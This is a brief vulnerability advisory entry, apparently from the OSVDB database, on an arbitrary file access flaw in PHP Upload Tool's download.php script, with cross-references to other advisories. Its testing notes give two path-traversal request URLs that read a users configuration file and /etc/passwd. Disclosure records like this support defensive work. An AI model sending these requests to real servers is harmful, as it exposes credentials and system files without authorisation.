PHP Upload Tool bin/download.php filename Variable Arbitrary File Access

2006-11-17T09:04:32
ID OSVDB:30475
Type osvdb
Reporter OSVDB
Modified 2006-11-17T09:04:32

Description

Manual Testing Notes

http://[target]/upload/bin/download.php?filename=../conf/users.conf http://[target]/upload/bin/download.php?filename=/etc/passwd

References:

Vendor URL: http://uploadtool.sourceforge.net/ Secunia Advisory ID:22973 Related OSVDB ID: 30474 Other Advisory URL: http://www.craigheffner.com/security/exploits/upload_tool_php.txt ISS X-Force ID: 30322 FrSIRT Advisory: ADV-2006-4575 CVE-2006-7133 Bugtraq ID: 21150